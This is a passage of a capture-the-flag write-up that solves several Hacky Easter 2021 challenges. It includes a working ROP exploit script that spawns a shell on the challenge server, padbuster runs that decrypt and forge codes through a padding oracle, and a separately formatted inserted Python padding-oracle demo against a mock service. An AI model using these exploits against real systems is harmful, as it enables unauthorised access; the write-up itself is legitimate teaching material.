sym.imp.system<\/span>\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nIn order to spawn a shell we also need the string <span 
class=\"hl\">\/bin\/sh<\/span>.\r\n<\/p>\r\n\r\n<p>\r\nFortunately there is a comment that all references to <span class=\"hl\">\/bin\/sh<\/span> should be removed &#8230;\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n[0x00400670]&gt; iz\r\n[Strings]\r\nnth paddr      vaddr      len size section type  string\r\n\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\r\n0   0x00000918 0x00400918 37  38   .rodata ascii Welcome! Please give me your name!\\n&gt; \r\n1   0x0000093e 0x0040093e 25  26   .rodata ascii Hi %s, nice to meet you!\\n\r\n2   0x00000958 0x00400958 7   8    .rodata ascii \/bin\/ls\r\n3   0x00000960 0x00400960 46  47   .rodata ascii [!] Anti DoS Signal. Patch me out for testing.\r\n<span class=\"hl2\">0   0x00001080 0x00601080 56  57   .data   ascii Please ensure you remove _all_ references to the \/bin\/sh<\/span>\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\n&#8230;, which contains the string <span class=\"hl\">\/bin\/sh<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n[0x00400670]&gt; ps @ 0x006010b1\r\n\/bin\/sh\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe last thing we need are two gadgets. One to adjust the stack alignment (simple <span class=\"hl\">ret<\/span>, see <a href=\"#he21_16\">challenge 16<\/a>) and another one, which <span class=\"hl\">pop<\/span>s into <span class=\"hl\">RDI<\/span> in order to load the first argument to <span class=\"hl\">system<\/span>: the string <span class=\"hl\">\/bin\/sh<\/span>. 
Again we can use <span class=\"hl\">ROPgadget<\/span> to find these gadgets:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/29]\r\n\u2514\u2500$ ROPgadget --binary sailorsknot| grep ': ret' \r\n0x0000000000400295 : ret\r\n\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/29]\r\n\u2514\u2500$ ROPgadget --binary sailorsknot| grep ': pop rdi ; ret'\r\n0x00000000004007bf : pop rdi ; ret\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nNow we have everything we need to craft our exploit:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n#!\/usr\/bin\/env python3\r\n\r\nfrom pwn import *\r\n\r\noffset = 40\r\nsystem = 0x00400610\r\nbinsh  = 0x006010b1\r\npoprdi = 0x004007bf\r\nropnop = 0x00400295\r\n\r\nio = remote('46.101.107.117', 2112)\r\n\r\nexpl = b'A'*offset\r\nexpl += p64(ropnop)\r\nexpl += p64(poprdi)\r\nexpl += p64(binsh)\r\nexpl += p64(system)\r\n\r\nio.sendlineafter('name!', expl)\r\nio.interactive()\r\n\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nRunning the script successfully yields a shell:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/29]\r\n\u2514\u2500$ .\/expl.py \r\n[+] Opening connection to 46.101.107.117 on port 2112: Done\r\n[*] Switching to interactive mode\r\n\r\n&gt; Hi AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\x95@, nice to meet you!\r\n$ id\r\nuid=1000(ctf) gid=1000(ctf) groups=1000(ctf)\r\n$ ls -al\r\ntotal 56\r\ndrwxr-xr-x 1 root root  4096 Mar  3 08:35 .\r\ndrwxr-xr-x 1 root root  4096 Mar  3 08:34 ..\r\n-rw-r--r-- 1 root root   220 Apr  4  2018 .bash_logout\r\n-rw-r--r-- 1 root root  3771 Apr  4  2018 .bashrc\r\n-rw-r--r-- 1 root root   807 Apr  4  2018 .profile\r\n-rwxrwxr-x 1 root root  9008 Mar  3 08:34 challenge2\r\n-rw-rw-r-- 1 root root    31 Mar  3 08:34 flag\r\n-rwxrwxr-x 1 root root 18744 Mar  3 08:34 ynetd\r\n$ cat flag\r\nhe2021{s41l0r_r0p_f0r_pr0f1t}\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span 
class=\"hl\">he2021{s41l0r_r0p_f0r_pr0f1t}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_30\">HE21.30 Pix FX<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge30.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"hard\">7 (hard)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Web, Crypto<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>300<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>PS<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nHey there! We have our fancy new Pix FX service online!\r\n\r\nTry it out!\r\n\r\n<span class=\"fake_link\">http:\/\/46.101.107.117:2110<\/span>\r\n\r\nNote: The service is restarted every hour at x:00.\r\n\r\n<b>Hint<\/b>\r\n\r\negg\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nOn the provided website an image and an effect can be chosen:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_30_01.png\" alt=\"Website\"\/>\r\n<\/p>\r\n\r\n<p>\r\nAfter submitting the selection a code is displayed:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_30_02.png\" alt=\"Website\"\/>\r\n<\/p>\r\n\r\n<p>\r\nClicking on <span class=\"hl\">show image<\/span> leads to <span class=\"hl\">\/picture?code=&lt;CODE&gt;<\/span>, which displays the image with the applied effect:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_30_03.png\" alt=\"Website\"\/>\r\n<\/p>\r\n\r\n<p>\r\nBeneath the <span class=\"hl\">popular FX<\/span> codes there is one (<span class=\"hl\">41E5D00E5CECC3019834C99B403DE4B24933AF3087BCE219699D7E3EB178A06F7B4717A36C617760EC0AD8BFD5DF05B2<\/span>), which displays the desired egg. 
Though the applied effect makes the QR code unrecognizable:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_30_04.png\" alt=\"Website\"\/>\r\n<\/p>\r\n\r\n<p>\r\nWhen the code is changed slightly, we get a decryption error:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_30_05.png\" alt=\"Website\"\/>\r\n<\/p>\r\n\r\n<p>\r\nBecause of this I assumed that the application is probably vulnerable to a <a href=\"https:\/\/en.wikipedia.org\/wiki\/Padding_oracle_attack\" rel=\"noopener noreferrer\" target=\"_blank\">padding oracle attack<\/a>. <a href=\"https:\/\/devel0pment.de\/?p=461#chlg22\" rel=\"noopener noreferrer\" target=\"_blank\">HackyEaster 2018<\/a> also contained a challenge based on this attack.\r\n<\/p>\r\n\r\n<p>\r\nIn order to solve this without great effort, we can use <a href=\"https:\/\/tools.kali.org\/web-applications\/padbuster\" rel=\"noopener noreferrer\" target=\"_blank\">PadBuster<\/a>.\r\n<\/p>\r\n\r\n<p>\r\nAt first let&#8217;s decrypt the code from the egg. 
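Before handing the work to the tool, it is worth seeing what it does under the hood. The script below is an added example, not code from this writeup or from the challenge: it stands up a constructed local imitation of the service (a toy Feistel block cipher in CBC mode, PKCS#7 padding and a padding-validity leak) and runs both the decrypt and the encrypt step of the padding oracle attack against it. The PictureService class, the function names and the toy cipher are my assumptions; the real service's code is unknown.

```python
"""CBC padding-oracle walkthrough against a constructed stand-in for the Pix FX
service (demo code, not the challenge's implementation). A code is IV || CBC
ciphertext of PKCS#7-padded JSON, and the stand-in reacts differently to broken
padding. AES is swapped for a hash-based Feistel cipher (standard library only);
the attack itself does not care which block cipher sits underneath."""
import hashlib, os

BLOCK = 16

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def block_encrypt(key, block):  # 8-round Feistel permutation, a toy AES stand-in
    l, r = block[:8], block[8:]
    for i in range(8):
        l, r = r, xor(l, hashlib.sha256(key + bytes([i]) + r).digest()[:8])
    return l + r

def block_decrypt(key, block):  # exact inverse: rounds in reverse order
    l, r = block[:8], block[8:]
    for i in reversed(range(8)):
        l, r = xor(r, hashlib.sha256(key + bytes([i]) + l).digest()[:8]), l
    return l + r

def pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def unpad(data):
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc(key, iv, data, encrypt):
    prev, out = iv, b""
    for i in range(0, len(data), BLOCK):
        blk = data[i:i + BLOCK]
        if encrypt:
            prev = block_encrypt(key, xor(blk, prev))
            out += prev
        else:
            out += xor(block_decrypt(key, blk), prev)
            prev = blk
    return out

class PictureService:
    """Stand-in for /picture?code=...; padding_ok() is the leak the attack uses."""
    def __init__(self):
        self.key = os.urandom(16)
    def issue_code(self, plaintext):
        iv = os.urandom(BLOCK)
        return iv + cbc(self.key, iv, pad(plaintext), encrypt=True)
    def decode(self, code):
        return unpad(cbc(self.key, code[:BLOCK], code[BLOCK:], encrypt=False))
    def padding_ok(self, code):
        # The two response signatures padbuster reports (788 vs 792 bytes) are this
        # boolean. Authenticating the code (HMAC/AEAD) before decrypting removes it.
        try:
            self.decode(code)
            return True
        except ValueError:
            return False

def recover_intermediate(oracle, target):
    """D_k(target), padbuster's "Intermediate Bytes", recovered one byte at a time."""
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        padval = BLOCK - pos
        probe = bytearray(BLOCK)
        for j in range(pos + 1, BLOCK):   # already-known bytes are made to decrypt to padval
            probe[j] = inter[j] ^ padval
        for guess in range(256):
            probe[pos] = guess
            if not oracle(bytes(probe) + target):
                continue
            if pos == BLOCK - 1:          # rule out an accidental 02 02 / 03 03 03 ... match
                check = bytearray(probe)
                check[pos - 1] ^= 0xFF
                if not oracle(bytes(check) + target):
                    continue
            inter[pos] = guess ^ padval
            break
        else:
            raise RuntimeError("oracle never accepted byte %d" % pos)
    return bytes(inter)

def oracle_decrypt(oracle, code):
    """Decrypt mode: P_i = D_k(C_i) XOR C_(i-1), where C_0 is the IV."""
    blocks = [code[i:i + BLOCK] for i in range(0, len(code), BLOCK)]
    return unpad(b"".join(xor(recover_intermediate(oracle, c), p) for p, c in zip(blocks, blocks[1:])))

def oracle_encrypt(oracle, plaintext):
    """Encrypt mode: fix the last block to zeros, then choose C_(i-1) = D_k(C_i) XOR P_i backwards."""
    padded = pad(plaintext)
    out = cur = bytes(BLOCK)
    for i in range(len(padded) - BLOCK, -1, -BLOCK):
        cur = xor(recover_intermediate(oracle, cur), padded[i:i + BLOCK])
        out = cur + out
    return out
```

The decrypt step reproduces the "Intermediate Bytes" lines of padbuster's output, and the encrypt step is why a forged code from its encrypt mode ends in a block of zero bytes (32 zero hex digits); on the service side, rejecting any code whose authentication tag does not verify before decrypting removes the oracle entirely.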
We simply provide the following to <span class=\"hl\">padbuster<\/span>: the target URL, an encrypted sample (the code), the blocksize (<span class=\"hl\">16<\/span>) and the encoding (<span class=\"hl\">2<\/span> = upper hex):\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/30]\r\n\u2514\u2500$ <span class=\"hl2\">padbuster 'http:\/\/46.101.107.117:2110\/picture?code=41E5D00E5CECC3019834C99B403DE4B24933AF3087BCE219699D7E3EB178A06F7B4717A36C617760EC0AD8BFD5DF05B2' '41E5D00E5CECC3019834C99B403DE4B24933AF3087BCE219699D7E3EB178A06F7B4717A36C617760EC0AD8BFD5DF05B2' 16 -encoding 2<\/span>\r\n                                              \r\n+-------------------------------------------+\r\n| PadBuster - v0.3.3                        |\r\n| Brian Holyfield - Gotham Digital Science  | \r\n| labs@gdssecurity.com                      |\r\n+-------------------------------------------+\r\n\r\nINFO: The original request returned the following\r\n[+] Status: 200\r\n[+] Location: N\/A\r\n[+] Content Length: 123120   \r\n\r\nINFO: Starting PadBuster Decrypt Mode\r\n*** Starting Block 1 of 2 ***                 \r\n\r\nINFO: No error string was provided...starting response analysis\r\n\r\n*** Response Analysis Complete ***\r\n\r\nThe following response signatures were returned:\r\n\r\n-------------------------------------------------------\r\nID#     Freq    Status  Length  Location\r\n-------------------------------------------------------\r\n1       1       200     788     N\/A\r\n2 **    255     200     792     N\/A\r\n-------------------------------------------------------\r\n\r\nEnter an ID that matches the error condition\r\nNOTE: The ID# marked with ** is recommended : 2\r\n\r\nContinuing test with selection 2\r\n\r\n[+] Success: (97\/256) [Byte 16]\r\n[+] Success: (60\/256) [Byte 15]\r\n[+] Success: (167\/256) [Byte 14]\r\n[+] Success: (221\/256) [Byte 13]\r\n[+] Success: (5\/256) [Byte 12]\r\n[+] Success: (19\/256) [Byte 11]\r\n[+] 
Success: (237\/256) [Byte 10]\r\n[+] Success: (86\/256) [Byte 9]\r\n[+] Success: (214\/256) [Byte 8]\r\n[+] Success: (84\/256) [Byte 7]\r\n[+] Success: (128\/256) [Byte 6]\r\n[+] Success: (207\/256) [Byte 5]\r\n[+] Success: (146\/256) [Byte 4]\r\n[+] Success: (73\/256) [Byte 3]\r\n[+] Success: (56\/256) [Byte 2]\r\n[+] Success: (214\/256) [Byte 1]\r\n\r\nBlock 1 Results:\r\n[+] Cipher Text (HEX): 4933af3087bce219699d7e3eb178a06f\r\n[+] Intermediate Bytes (HEX): 3ac7b9633d8ba623a214ebfe275ac69e\r\n[+] Plain Text: {\"image\": \"egg\",\r\n\r\nUse of uninitialized value $plainTextBytes in concatenation (.) or string at \/usr\/bin\/padbuster line 361, &lt;STDIN&gt; line 1.\r\n*** Starting Block 2 of 2 ***\r\n\r\n[+] Success: (147\/256) [Byte 16]\r\n[+] Success: (95\/256) [Byte 15]\r\n[+] Success: (136\/256) [Byte 14]\r\n[+] Success: (56\/256) [Byte 13]\r\n[+] Success: (241\/256) [Byte 12]\r\n[+] Success: (168\/256) [Byte 11]\r\n[+] Success: (96\/256) [Byte 10]\r\n[+] Success: (189\/256) [Byte 9]\r\n[+] Success: (156\/256) [Byte 8]\r\n[+] Success: (117\/256) [Byte 7]\r\n[+] Success: (46\/256) [Byte 6]\r\n[+] Success: (19\/256) [Byte 5]\r\n[+] Success: (165\/256) [Byte 4]\r\n[+] Success: (60\/256) [Byte 3]\r\n[+] Success: (226\/256) [Byte 2]\r\n[+] Success: (135\/256) [Byte 1]\r\n\r\nBlock 2 Results:\r\n[+] Cipher Text (HEX): 7b4717a36c617760ec0ad8bfd5df05b2\r\n[+] Intermediate Bytes (HEX): 6911ca56e1d9816d4ba75e0acc7ba36c\r\n[+] Plain Text:  \"effect\": 4}\r\n\r\n-------------------------------------------------------\r\n** Finished ***\r\n\r\n[+] Decrypted value (ASCII): <span class=\"hl2\">{\"image\": \"egg\", \"effect\": 4}<\/span>\r\n\r\n[+] Decrypted value (HEX): 7B22696D616765223A2022656767222C2022656666656374223A20347D030303\r\n\r\n[+] Decrypted value (Base64): eyJpbWFnZSI6ICJlZ2ciLCAiZWZmZWN0IjogNH0DAwM=\r\n\r\n-------------------------------------------------------\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\n<span class=\"hl\">padbuster<\/span> recovers the plaintext 
byte by byte. After a few seconds we get the full plaintext: <span class=\"hl\">{&#8220;image&#8221;: &#8220;egg&#8221;, &#8220;effect&#8221;: 4}<\/span>.\r\n<\/p>\r\n\r\n<p>\r\nIn order to get an image of the egg with a less noisy effect, we choose effect <span class=\"hl\">3<\/span>. At first we need to encode the plaintext we want to encrypt:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n&gt;&gt;&gt; b'{\"image\": \"egg\", \"effect\": 3}'.hex().upper()\r\n'7B22696D616765223A2022656767222C2022656666656374223A20337D'\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nNow we can simply provide it to <span class=\"hl\">padbuster<\/span> and run it again:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/30]\r\n\u2514\u2500$ <span class=\"hl2\">padbuster 'http:\/\/46.101.107.117:2110\/picture?code=41E5D00E5CECC3019834C99B403DE4B24933AF3087BCE219699D7E3EB178A06F7B4717A36C617760EC0AD8BFD5DF05B2' '41E5D00E5CECC3019834C99B403DE4B24933AF3087BCE219699D7E3EB178A06F7B4717A36C617760EC0AD8BFD5DF05B2' 16 -encoding 2 -encodedtext 7B22696D616765223A2022656767222C2022656666656374223A20337D<\/span>\r\n\r\n+-------------------------------------------+\r\n| PadBuster - v0.3.3                        |\r\n| Brian Holyfield - Gotham Digital Science  |\r\n| labs@gdssecurity.com                      |\r\n+-------------------------------------------+\r\n\r\nINFO: The original request returned the following\r\n[+] Status: 200                 \r\n[+] Location: N\/A               \r\n[+] Content Length: 123120     \r\n                                              \r\nINFO: Starting PadBuster Encrypt Mode\r\n[+] Number of Blocks: 2       \r\n                                              \r\nINFO: No error string was provided...starting response analysis\r\n                                              \r\n*** Response Analysis Complete ***\r\n\r\nThe following response signatures were returned:\r\n\r\n-------------------------------------------------------\r\nID#     Freq    Status  Length  
Location\r\n-------------------------------------------------------\r\n1       1       200     788     N\/A\r\n2 **    255     200     792     N\/A\r\n-------------------------------------------------------\r\n\r\nEnter an ID that matches the error condition\r\nNOTE: The ID# marked with ** is recommended : 2\r\n\r\nContinuing test with selection 2\r\n\r\n[+] Success: (158\/256) [Byte 16]\r\n[+] Success: (70\/256) [Byte 15]\r\n[+] Success: (74\/256) [Byte 14]\r\n[+] Success: (159\/256) [Byte 13]\r\n[+] Success: (105\/256) [Byte 12]\r\n[+] Success: (54\/256) [Byte 11]\r\n[+] Success: (114\/256) [Byte 10]\r\n[+] Success: (169\/256) [Byte 9]\r\n[+] Success: (201\/256) [Byte 8]\r\n[+] Success: (97\/256) [Byte 7]\r\n[+] Success: (114\/256) [Byte 6]\r\n[+] Success: (164\/256) [Byte 5]\r\n[+] Success: (119\/256) [Byte 4]\r\n[+] Success: (132\/256) [Byte 3]\r\n[+] Success: (167\/256) [Byte 2]\r\n[+] Success: (111\/256) [Byte 1]\r\n\r\nBlock 2 Results:\r\n[+] New Cipher Text (HEX): a17417e236e0f64a7db3eca118b6bb60\r\n[+] Intermediate Bytes (HEX): 815672845085953e5f89cc9265b5b863\r\n\r\n\r\n[+] Success: (217\/256) [Byte 16]\r\n[+] Success: (165\/256) [Byte 15]\r\n[+] Success: (35\/256) [Byte 14]\r\n[+] Success: (169\/256) [Byte 13]\r\n[+] Success: (35\/256) [Byte 12]\r\n[+] Success: (6\/256) [Byte 11]\r\n[+] Success: (55\/256) [Byte 10]\r\n[+] Success: (173\/256) [Byte 9]\r\n[+] Success: (190\/256) [Byte 8]\r\n[+] Success: (76\/256) [Byte 7]\r\n[+] Success: (167\/256) [Byte 6]\r\n[+] Success: (134\/256) [Byte 5]\r\n[+] Success: (199\/256) [Byte 4]\r\n[+] Success: (4\/256) [Byte 3]\r\n[+] Success: (215\/256) [Byte 2]\r\n[+] Success: (213\/256) [Byte 1]\r\n\r\nBlock 1 Results:\r\n[+] New Cipher Text (HEX): 40049b591735db6961eedebd34b97b0a\r\n[+] Intermediate Bytes (HEX): 3b26f2347652be4b5bcefcd853de5926\r\n\r\n-------------------------------------------------------\r\n** Finished ***\r\n\r\n[+] Encrypted value is: <span 
class=\"hl2\">40049B591735DB6961EEDEBD34B97B0AA17417E236E0F64A7DB3ECA118B6BB6000000000000000000000000000000000<\/span>\r\n-------------------------------------------------------\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe result is the encrypted value, which we can now use as a code:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_30_06.png\" alt=\"Egg\"\/>\r\n<\/p>\r\n\r\n<p>\r\nThis time we can scan the QR code:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/30]\r\n\u2514\u2500$ zbarimg egg.jpeg \r\nQR-Code:he2021{fl1pp1n_da_b1ts_gr34t_succ355}\r\nscanned 1 barcode symbols from 1 images in 0.02 seconds\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{fl1pp1n_da_b1ts_gr34t_succ355}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_31\">HE21.31 Hunny Bunny<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge31.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"medium\">7 (medium)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Crypto<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>200<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>khae<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nhunnybunny loves music! 
Can you figure out what else he loves?\r\n\r\n<span class=\"hl\">4ab56415e91e6d5172ee79d9810e30be5da8af18\r\nc19a3ca5251db76b221048ca0a445fc39ba576a0\r\nfdb2c9cd51459c2cc38c92af472f3275f8a6b393\r\n6d586747083fb6b20e099ba962a3f5f457cbaddb\r\n5587adf42a547b141071cedc7f0347955516ae13<\/span>\r\n\r\nflag format: <span class=\"hl\">he2021{lowercaseonlynospaces}<\/span>\r\n\r\n<b>Hint<\/b>\r\n\r\n- The values can be cracked, but they need to be changed somehow first.\r\n- One of the values represents the flag prefix.\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\n<span class=\"hl\">SHA1<\/span> produces an output very similar to one of the values from the list when calculated for the beginning of the flag (<span class=\"hl\">he2021{<\/span>):\r\n<\/p>\r\n\r\n<p>\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/31]\r\n\u2514\u2500$ echo -n 'he2021{'|sha1sum\r\n4de56415b91b6a5172bb79a9810b30eb5ad8dc18  -\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nComparing it with the value from the list shows the following differences:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/31]\r\n\u2514\u2500$ echo -n 'he2021{'|sha1sum;echo 4ab56415e91e6d5172ee79d9810e30be5da8af18\r\n4<span class=\"hl2\">de<\/span>56415<span class=\"hl2\">b<\/span>91<span class=\"hl2\">b<\/span>6<span class=\"hl2\">a<\/span>5172<span class=\"hl2\">bb<\/span>79<span class=\"hl2\">a<\/span>9810<span class=\"hl2\">b<\/span>30<span class=\"hl2\">eb<\/span>5<span class=\"hl2\">ad<\/span>8<span class=\"hl2\">dc<\/span>18  -\r\n4<span class=\"hl2\">ab<\/span>56415<span class=\"hl2\">e<\/span>91<span class=\"hl2\">e<\/span>6<span class=\"hl2\">d<\/span>5172<span class=\"hl2\">ee<\/span>79<span class=\"hl2\">d<\/span>9810<span class=\"hl2\">e<\/span>30<span class=\"hl2\">be<\/span>5<span class=\"hl2\">da<\/span>8<span class=\"hl2\">af<\/span>18\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nIt seems that the following values are 
swapped:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\na &lt;-&gt; d\r\nb &lt;-&gt; e\r\nc &lt;-&gt; f\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nWe can use the following script to reverse this modification (just swap the values again):\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n#!\/usr\/bin\/env python3\r\n\r\ndef change_hash(h):\r\n  r = ''\r\n  for c in h:\r\n    if (c == 'a'): r += 'd'\r\n    elif (c == 'b'): r += 'e'\r\n    elif (c == 'c'): r += 'f'\r\n    elif (c == 'd'): r += 'a'\r\n    elif (c == 'e'): r += 'b'\r\n    elif (c == 'f'): r += 'c'\r\n    else: r += c\r\n  return r\r\n\r\nhashes = ['4ab56415e91e6d5172ee79d9810e30be5da8af18', 'c19a3ca5251db76b221048ca0a445fc39ba576a0', 'fdb2c9cd51459c2cc38c92af472f3275f8a6b393', '6d586747083fb6b20e099ba962a3f5f457cbaddb', '5587adf42a547b141071cedc7f0347955516ae13']\r\n\r\nfor h in hashes:\r\n  print(change_hash(h))\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nRunning the script should output the actual <span class=\"hl\">SHA1<\/span> hashes:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/31]\r\n\u2514\u2500$ .\/swap0r.py \r\n4de56415b91b6a5172bb79a9810b30eb5ad8dc18\r\nf19d3fd5251ae76e221048fd0d445cf39ed576d0\r\ncae2f9fa51459f2ff38f92dc472c3275c8d6e393\r\n6a586747083ce6e20b099ed962d3c5c457fedaae\r\n5587dac42d547e141071fbaf7c0347955516db13\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nNow we can for example use <a href=\"https:\/\/crackstation.net\" rel=\"noopener noreferrer\" target=\"_blank\">CrackStation<\/a> to crack these hashes:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_31_01.png\" alt=\"Cracked\"\/>\r\n<\/p>\r\n\r\n<p>\r\nThe only hash not cracked is the flag prefix.\r\n<\/p>\r\n\r\n<p>\r\nBy concatenating the substrings we get the flag:\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{hunnybunnyilovemumsomuch!}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_32\">HE21.32 Two Yolks<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src 
=\"wp-content\/uploads\/2021\/04\/challenge32.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"medium\">7 (medium)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Forensics<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>200<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>PS<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nThis egg has two yolks.\r\n\r\nBut the second seems to be hidden somehow.\r\n\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_32_01.png\" width=\"300px\"\/>\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nUsing <span class=\"hl\">pngcheck<\/span> we can see that the image is using a palette with <span class=\"hl\">33<\/span> entries:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/32]\r\n\u2514\u2500$ <span class=\"hl2\">pngcheck -v twoyolks.png<\/span>\r\nFile: twoyolks.png (31389 bytes)\r\n  chunk IHDR at offset 0x0000c, length 13\r\n    1024 x 1024 image, 8-bit palette, non-interlaced\r\n  chunk PLTE at offset 0x00025, length 99: <span class=\"hl2\">33 palette entries<\/span>\r\n  chunk tRNS at offset 0x00094, length 11: 11 transparency entries\r\n  chunk IDAT at offset 0x000ab, length 13903\r\n    zlib: deflated, 32K window, maximum compression\r\n  chunk YHDR at offset 0x03706, length 0:  illegal (unless recently approved) unknown, public chunk\r\nERRORS DETECTED in twoyolks.png\r\n\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nIn order to get the pixel data, we can use <span class=\"hl\">binwalk<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/32]\r\n\u2514\u2500$ binwalk --extract twoyolks.png \r\n\r\nDECIMAL       HEXADECIMAL     DESCRIPTION\r\n--------------------------------------------------------------------------------\r\n0             0x0             PNG image, 1024 x 1024, 8-bit colormap, non-interlaced\r\n175           0xAF            Zlib 
